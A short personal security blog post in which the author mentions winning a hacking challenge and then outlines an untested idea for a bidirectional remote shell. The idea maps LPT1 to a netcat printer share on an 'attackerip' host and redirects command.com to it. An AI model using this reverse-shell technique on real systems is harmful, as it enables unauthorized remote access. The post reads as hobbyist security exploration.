First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge. When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs". Thanks to Ed for putting together a fun challenge. I always learn a lot any time I do anything related to Jedi Master Skoudo.
THEN I see this entry on Wesley's blog on pretending to be a printer with netcat. It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back April 08. Using that technique I was able to shovel command output to netcat running on an arbitrary port. But I really want a bidirectional interactive shell. The thought is this.
1) Share a netcat listener on my linux box over SMB.
2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled
3) Net use lpt1 \\attackerip\netcatshare
4) command.com lpt1
command.com (The 16 bit predecessor to CMD.EXE) allows you to redirect I/O to a device. Seems like it should work. This should be fun.